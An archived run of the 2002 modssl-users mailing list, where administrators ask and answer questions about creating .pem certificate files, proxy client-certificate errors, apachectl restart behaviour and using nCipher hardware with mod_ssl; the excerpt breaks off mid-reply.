Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id IAA11471
	for ; Sat, 20 Apr 2002 08:21:45 -0400
Date: Sat, 20 Apr 2002 08:21:45 -0400 (EDT)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: Re: Urgent help
In-Reply-To: <008c01c1e86a$2054f2a0$4d38e63f@microanswers.net>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



So much ergency, what perhaps 4 different "Urgent" requests??


Oh well...

Thanks,


Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Apr 20 19:43:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA10708; Sat, 20 Apr 2002 19:41:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.nwcascades.com id TAA10664; Sat, 20 Apr 2002 19:40:16 +0200 (MET DST)
Received: from nwcascades.com (netadmin.nwcascades.com [192.168.1.11])
	by mail.nwcascades.com (8.11.6/8.11.6) with ESMTP id g3KHe8x21316
	for ; Sat, 20 Apr 2002 10:40:08 -0700
Message-ID: <3CC1A7F9.36952443@nwcascades.com>
Date: Sat, 20 Apr 2002 10:40:09 -0700
From: Jack Lauman 
Organization: nwcascades.com
X-Mailer: Mozilla 4.79 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: "modssl-users@modssl.org" 
Subject: Creating .pem files
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jack Lauman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have a certificate from Thawte and need to make .pem files to
enable SSL on sendmail and IMAP.  Can I create these files from
the existing .crt and .key files?  If so, how?
Any help would be appreciated.

Regards,

Jack
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Apr 20 20:11:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA12295; Sat, 20 Apr 2002 20:10:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.thenewpush.com id UAA12253; Sat, 20 Apr 2002 20:09:18 +0200 (MET DST)
Received: (qmail 18343 invoked from network); 20 Apr 2002 18:13:58 -0000
Received: from unknown (HELO thenewpush.com) (bnagy@thenewpush.com@64.32.183.122)
  by sophocles with RC4-MD5 encrypted SMTP; 20 Apr 2002 18:13:58 -0000
Message-ID: <3CC1AD47.9040804@thenewpush.com>
Date: Sat, 20 Apr 2002 12:02:47 -0600
From: =?ISO-8859-1?Q?Bal=E1zs?= Nagy 
Organization: theNewPush, LLC.
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.4.1) Gecko/20020314 Netscape6/6.2.2
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Creating .pem files
References: <3CC1A7F9.36952443@nwcascades.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?Bal=E1zs?= Nagy 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

cat cert.key cert.crt > cert.pem
replace cert with the actual name of your cert

Jack Lauman wrote:

 > I have a certificate from Thawte and need to make .pem files to
 > enable SSL on sendmail and IMAP.  Can I create these files from
 > the existing .crt and .key files?  If so, how?
 > Any help would be appreciated.
 >
 > Regards,
 >
 > Jack
 > ______________________________________________________________________
 > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
 > User Support Mailing List                      modssl-users@modssl.org
 > Automated List Manager                            majordomo@modssl.org
 >


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Apr 20 20:32:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA12905; Sat, 20 Apr 2002 20:31:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.nwcascades.com id UAA12890; Sat, 20 Apr 2002 20:30:28 +0200 (MET DST)
Received: from nwcascades.com (netadmin.nwcascades.com [192.168.1.11])
	by mail.nwcascades.com (8.11.6/8.11.6) with ESMTP id g3KIUKx21505
	for ; Sat, 20 Apr 2002 11:30:20 -0700
Message-ID: <3CC1B3BD.696F210@nwcascades.com>
Date: Sat, 20 Apr 2002 11:30:21 -0700
From: Jack Lauman 
Organization: nwcascades.com
X-Mailer: Mozilla 4.79 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Creating .pem files
References: <3CC1A7F9.36952443@nwcascades.com> <3CC1AD47.9040804@thenewpush.com>
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id UAA12900
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jack Lauman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I more quick question.  I need to set up a secure mailer (encrypted)
to send messages containing online order information.  What's the best
(safest) way to do this?

Will each remote user need a public key (chances are at least the buyer
won't have one)?

Regards,

Jack

Balázs Nagy wrote:
> 
> cat cert.key cert.crt > cert.pem
> replace cert with the actual name of your cert
> 
> Jack Lauman wrote:
> 
>  > I have a certificate from Thawte and need to make .pem files to
>  > enable SSL on sendmail and IMAP.  Can I create these files from
>  > the existing .crt and .key files?  If so, how?
>  > Any help would be appreciated.
>  >
>  > Regards,
>  >
>  > Jack
>  > ______________________________________________________________________
>  > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>  > User Support Mailing List                      modssl-users@modssl.org
>  > Automated List Manager                            majordomo@modssl.org
>  >
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Apr 20 20:54:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA13457; Sat, 20 Apr 2002 20:53:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA13427; Sat, 20 Apr 2002 20:52:26 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id E10E24CE73D; Sat, 20 Apr 2002 20:52:25 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g3KIdlR86076; Sat, 20 Apr 2002 20:39:47 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.thenewpush.com id TAA11334; Sat, 20 Apr 2002 19:54:57 +0200 (MET DST)
Received: (qmail 18166 invoked from network); 20 Apr 2002 17:59:27 -0000
Received: from unknown (HELO thenewpush.com) (bnagy@thenewpush.com@64.32.183.122)
  by sophocles with RC4-MD5 encrypted SMTP; 20 Apr 2002 17:59:27 -0000
Message-ID: <3CC1A9D8.1080404@thenewpush.com>
Date: Sat, 20 Apr 2002 11:48:08 -0600
From: =?ISO-8859-1?Q?Bal=E1zs?= Nagy 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.4.1) Gecko/20020314 Netscape6/6.2.2
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Creating .pem files
References: <3CC1A7F9.36952443@nwcascades.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?Bal=E1zs?= Nagy 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

cat cert.key cert.crt > cert.pem
replace cert with the actual name of your cert

Jack Lauman wrote:

> I have a certificate from Thawte and need to make .pem files to
> enable SSL on sendmail and IMAP.  Can I create these files from
> the existing .crt and .key files?  If so, how?
> Any help would be appreciated.
> 
> Regards,
> 
> Jack
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 


-- 
Cheers,
	Balázs

thenewpush, LLC / 303-523-5729 / 720-283-2873
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Apr 21 00:31:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA22775; Sun, 21 Apr 2002 00:30:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.thenewpush.com id AAA22765; Sun, 21 Apr 2002 00:30:10 +0200 (MET DST)
Received: (qmail 21803 invoked from network); 20 Apr 2002 22:34:51 -0000
Received: from unknown (HELO thenewpush.com) (bnagy@thenewpush.com@64.32.183.122)
  by sophocles with RC4-MD5 encrypted SMTP; 20 Apr 2002 22:34:51 -0000
Message-ID: <3CC1EA6A.2070307@thenewpush.com>
Date: Sat, 20 Apr 2002 16:23:38 -0600
From: =?ISO-8859-1?Q?Bal=E1zs?= Nagy 
Organization: theNewPush, LLC.
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.4.1) Gecko/20020314 Netscape6/6.2.2
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Creating .pem files
References: <3CC1A7F9.36952443@nwcascades.com> <3CC1AD47.9040804@thenewpush.com> <3CC1B3BD.696F210@nwcascades.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?Bal=E1zs?= Nagy 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Jack Lauman wrote:

> I more quick question.  I need to set up a secure mailer (encrypted)
> to send messages containing online order information.  What's the best
> (safest) way to do this?
> 
> Will each remote user need a public key (chances are at least the buyer
> won't have one)?


I use QMail/vmail-mgr/Courier-IMAP to provide a secure mail toaster
to our clients.


We can only provide passwd authentication (TLS before SMTP auth) for
Outlook users, because Outlook is unable to present a mail cert to
mail servers.

If you only have Netscape users, you can also use client certs.



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Apr 21 07:30:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA08230; Sun, 21 Apr 2002 07:29:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web12705.mail.yahoo.com id HAA08221; Sun, 21 Apr 2002 07:28:40 +0200 (MET DST)
Message-ID: <20020421052839.96761.qmail@web12705.mail.yahoo.com>
Received: from [156.153.255.243] by web12705.mail.yahoo.com via HTTP; Sat, 20 Apr 2002 22:28:39 PDT
Date: Sat, 20 Apr 2002 22:28:39 -0700 (PDT)
From: Anbuchezhian Chelliah 
Subject: Proxy client certificate
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Anbuchezhian Chelliah 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello All,

   ** I am sorry to send you this mail again. If
someone knows anything on this, please reply. Thanks a
lot in advance **.
 
  I am trying to make a proxy server(apache 1.3.22
compiled after enabling SSL_EXPERIMENTAL) authenticate
itself to a backend server(apache 1.3.19) which is in
the same machine (although in a real scenario the
backend server will run on a different machine).
 
   Proxyserver listens at port 6666 on a machine and
the backend server listnes at 127.0.0.2:8443. All the
communications are SSL-enabled.
 browser ->---SSL + client auth--> Proxy server
--SSL-->backend server.
  Browser authenticates itself to the proxy server
whereas proxy server does not authenticate itself to
the backend server.
   
 Now, the need is to make the proxy server also
authenticate itself to the backend server. 
 The proxy server has  the directive
"SSLProxyMachineCertficateFile" in it's httpd.conf.
This directive has the value set to the its'(proxy's)
client certificate. 
 Should I need to set the value for  
SSLProxyCACertficateFile also?
 
The error I see in the browser is:
        ------------------
     The proxy server received an invalid response
from an upstream server.

The proxy server could not handle the request GET /.

Reason: SSL proxy connect failed (test:6666): peer
127.0.0.1:8443: key values mismatch
        -------------------

and the error that I see in the backend server is 
       ---------------------
[error] mod_ssl: SSL handshake failed (server
vvos3:8443, client 127.0.0.1) (OpenSSL library error
follows)
[Sun Apr 21 10:56:32 2002] [error] OpenSSL:
error:140890C7:SSL
routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not
return a certificate [Hint: No CAs known to server for
verification?]
         ------------------------
Can anyone please throw light on this ?

Thanks a lot in advance.

Thanks and Regards,
Anbu

__________________________________________________
Do You Yahoo!?
Yahoo! Games - play chess, backgammon, pool and more
http://games.yahoo.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 22 14:53:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA24236; Mon, 22 Apr 2002 14:52:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns1.microanswers.net id OAA24194; Mon, 22 Apr 2002 14:51:15 +0200 (MET DST)
Received: from ws1 (microanswers.net [63.230.56.77] (may be forged))
	by ns1.microanswers.net (8.11.0/8.11.0) with SMTP id g3MCZ0C03607;
	Mon, 22 Apr 2002 07:35:00 -0500
Message-ID: <00a601c1e9fc$a71535a0$4d38e63f@microanswers.net>
From: "Andrew Lietzow" 
To: "Sonu Kishore" , 
References: <20020422113209.83744.qmail@web11306.mail.yahoo.com>
Subject: Re; Re; Even more so - Re: Urgent Help
Date: Mon, 22 Apr 2002 07:53:08 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andrew Lietzow" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Dear Sonu,
RE:>>I have configured my httpd.conf & ssl.conf file also but probably I am
not
doing something right as my site is not opening as required.
...and...
RE:>>> I have one page which has to be http
> I have the second page which has to be https with sslverifyclient none
> I have a third page which is https with sslverifyclient require
> I have read that i will require IP base virtual hosts.
...and...
RE:>>
I want to use apache 2.0 how do I configure it with mod_ssl & openssl.
--------
Okay, now that you have shared the background, what exactly is happening?  I
guess the reason I was (on Saturday) curious as to whether you have followed
guides available
from Apache, openssl, and mod_ssl is because FOR ME, the Apache 2.0.35
system
configured very quickly to provide a secure server, without hardly a
whimper.  Download the tarball,
run configure, generate the key, csr, and crt, and voila, secure server is
up and running.  This does
not, however, address your last configuration, with sslverifyclient =>
require.  That I have not tried.

However, if you can provide the scenario for your error or perceived
disfunctionality of the system,
then possibly someone can help you quickly move forward.  I doubt that it is
I, but send
more information and I'll be glad to help if I can.  Most here will do the
same, or so I believe,
or they probably wouldn't continue to subscribe.

Take some time to thoroughly clearly describe the error or the problem and
you may get some
very quick help.

Good Luck!

Andrew Lietzow
The ACL Group, Inc.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 22 18:28:55 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA05629; Mon, 22 Apr 2002 18:27:40 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ewok.sytrix.com id SAA05541; Mon, 22 Apr 2002 18:26:22 +0200 (MET DST)
Received: from 226.balt.vasco.com (gateway.vasco.com [209.140.121.226])
	by ewok.sytrix.com (8.11.6/8.11.6) with SMTP id g3MFVqP08509
	for ; Mon, 22 Apr 2002 11:31:52 -0400
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [209.140.121.242]) with SMTP; 22 Apr 2002 16:26:15 UT
Date: Mon, 22 Apr 2002 12:23:35 -0400
MIME-Version: 1.0
Subject: potential apachectl modification
Message-ID: <3CC400C7.17918.ED39B29@localhost>
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Does it make sense to have a restartssl directive, to match the restart 
directive?

---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 22 18:29:02 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA05683; Mon, 22 Apr 2002 18:28:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fw1.gdm.de id SAA05594; Mon, 22 Apr 2002 18:27:15 +0200 (MET DST)
From: Alex.Apostolopoulos@secartis.com
Received: by fw1.gdm.de (8.11.6/8.11.6) id g3MGRAj16116
	for modssl-users@modssl.org; Mon, 22 Apr 2002 18:27:10 +0200 (CEST)
Received: (from localhost) by fw1.gdm.de (MSCAN) id 3/fw1.gdm.de/smtp-gw/mscan; Mon Apr 22 18:27:10 2002
To: modssl-users@modssl.org
Subject: encipher box
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 5.07a  May 14, 2001
Message-ID: 
Date: Mon, 22 Apr 2002 18:26:55 +0200
X-MIMETrack: MIME-CD by Notes Server on NOTESGDM3/SRV/GuD(Release 5.0.8 |June 18, 2001) at
 04/22/2002 06:26:56 PM,
	MIME-CD complete at 04/22/2002 06:26:56 PM,
	Serialize by Router on NOTESDMZ1/SRV/GuD(Release 5.0.8 |June 18, 2001) at
 04/22/2002 06:31:39 PM
Content-type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex.Apostolopoulos@secartis.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



Hi,

does anybody have any experience, links or hints how connect mod_ssl and
enchiper boxes ???


As I am new to this list I am not sure if this is right place to ask this
question.

cheers Alex Apostolopoulos
_______________________________________________________
WebTechnology & Smart Card Solutions

Secartis AG-eSolutions by Giesecke & Devrient
Bretonischer Ring 3, D-85630 Grasbrunn, Germany

Phone: +49(0)89 4119-7086, Fax: +49(0)89 4119-7403
Email: alex.apostolopoulos@secartis.com, Home: www.secartis.com
_______________________________________________________

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 22 18:36:51 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA06622; Mon, 22 Apr 2002 18:35:37 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from statler.squaretrade.com id SAA06522; Mon, 22 Apr 2002 18:34:45 +0200 (MET DST)
Received: from glen by statler.squaretrade.com with local (Exim 3.33 #1 (Debian))
	id 16zglo-0000ty-00
	for ; Mon, 22 Apr 2002 09:34:28 -0700
Date: Mon, 22 Apr 2002 09:34:28 -0700
To: modssl-users@modssl.org
Subject: Re: potential apachectl modification
Message-ID: <20020422163428.GA31474@squaretrade.com>
References: <3CC400C7.17918.ED39B29@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3CC400C7.17918.ED39B29@localhost>
User-Agent: Mutt/1.3.25i
From: Glen Mehn 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Glen Mehn 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

'restart' and 'graceful' will restart the server with -DSSL, if it's (currently)running with -DSSL.

'restart' sends a SIGHUP to apache
'graceful' sends a SIGUSR1 to apache, which httpd reads as 'finish what you're doing, then HUP yourself'.

glen

On Mon, Apr 22, 2002 at 12:23:35PM -0400, Aryeh Katz wrote:
> Does it make sense to have a restartssl directive, to match the restart 
> directive?
> 
> ---
> Aryeh Katz
> VASCO 			
> www.vasco.com		
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
Glen S Mehn
Contract Systems Administrator		SquareTrade, Inc
glen@squaretrade.com	Building Trust in Transactions (sm)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 22 18:41:40 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA07214; Mon, 22 Apr 2002 18:41:02 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.speakeasy.net id SAA07077; Mon, 22 Apr 2002 18:39:46 +0200 (MET DST)
Received: (qmail 10370 invoked from network); 22 Apr 2002 16:39:43 -0000
Received: from unknown (HELO bio2) ([64.24.216.101]) (envelope-sender )
          by mail14.speakeasy.net (qmail-ldap-1.03) with SMTP
          for ; 22 Apr 2002 16:39:43 -0000
Message-ID: <008d01c1ea1c$bef07ca0$65d81840@bio2>
From: "Frank Reichenbacher" 
To: 
References: <3CC400C7.17918.ED39B29@localhost>
Subject: Re: potential apachectl modification
Date: Mon, 22 Apr 2002 09:42:49 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Frank Reichenbacher" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Use apachectl graceful.

Frank

----- Original Message ----- 
From: "Aryeh Katz" 
To: 
Sent: Monday, April 22, 2002 9:23 AM
Subject: potential apachectl modification


> Does it make sense to have a restartssl directive, to match the restart 
> directive?
> 
> ---
> Aryeh Katz
> VASCO 
> www.vasco.com 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 22 19:13:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA08740; Mon, 22 Apr 2002 19:12:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ewok.sytrix.com id TAA08706; Mon, 22 Apr 2002 19:11:54 +0200 (MET DST)
Received: from 226.balt.vasco.com (gateway.vasco.com [209.140.121.226])
	by ewok.sytrix.com (8.11.6/8.11.6) with SMTP id g3MGHTP08529
	for ; Mon, 22 Apr 2002 12:17:29 -0400
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [209.140.121.242]) with SMTP; 22 Apr 2002 17:11:52 UT
Date: Mon, 22 Apr 2002 13:09:13 -0400
MIME-Version: 1.0
Subject: Re: potential apachectl modification
Message-ID: <3CC40B79.10529.EFD6168@localhost>
In-reply-to: <008d01c1ea1c$bef07ca0$65d81840@bio2>
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> Use apachectl graceful.
> 
I suppose I should have done a little more research before posting.
I had a script that did a restart, and the restart reported an error. I then tried a 
start and everything worked fine, so I assumed that restart did a kill then a 
start, and thus needed to be changed for ssl.
Once I got these mails, I looked a little closer, and I'm seeing some strange 
behavior.
apachectl configtest complains on SSLEngine off in my :80 virtual host.
Fine, doesn't bother me, I comment it out (wondering why only httpd -t 
complains, and not a regular startup).
I then ran apachectl configtest again, and it reported no errors.
I ran httpd -t from the command line, and it said
Syntax OK
Segmentation Fault.
Call stack on the Segmentation Fault indicates that it's on the 
unload_module.
I do have a module of my own that is loaded, which when removed, allows 
httpd -t to run fine.
Does anyone have any suggestions for what my module might be doing to 
cause the configtest to core on unload?
Thanks.
Aryeh

> Frank
> 
> ----- Original Message ----- 
> From: "Aryeh Katz" 
> To: 
> Sent: Monday, April 22, 2002 9:23 AM
> Subject: potential apachectl modification
> 
> 
> > Does it make sense to have a restartssl directive, to match the
> > restart directive?
> > 
> > ---
> > Aryeh Katz
> > VASCO 
> > www.vasco.com 
> > 
> > ____________________________________________________________________
> > __ Apache Interface to OpenSSL (mod_ssl)                  
> > www.modssl.org User Support Mailing List                     
> > modssl-users@modssl.org Automated List Manager                      
> >      majordomo@modssl.org
> > 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 22 19:17:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA09065; Mon, 22 Apr 2002 19:16:40 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id TAA09036; Mon, 22 Apr 2002 19:15:48 +0200 (MET DST)
Received: from itaction.co.uk ([212.36.137.30]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GUZBXX00.VA9 for ; Mon, 22 Apr 2002
          18:15:33 +0100 
Message-ID: <3CC44538.4010107@itaction.co.uk>
Date: Mon, 22 Apr 2002 18:15:36 +0100
From: "Peter Viertel" 
Organization: IT Action Ltd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc1) Gecko/20020417
X-Accept-Language: en-gb, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: encipher box
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Yes, I've done it a few times with apache 1.3 on Solaris, still mucking
around with apache 2 though.

what you need is:

a) the nCipher software for the o/s - these are binary only and will set
up a daemon called hardserver, and another package that installs the
CHIL library. If they don't have packages for your o/s you are screwed.

b) get/compile openssl-engine not the standard openssl.

c) test openssl: on a sun it goes like this:

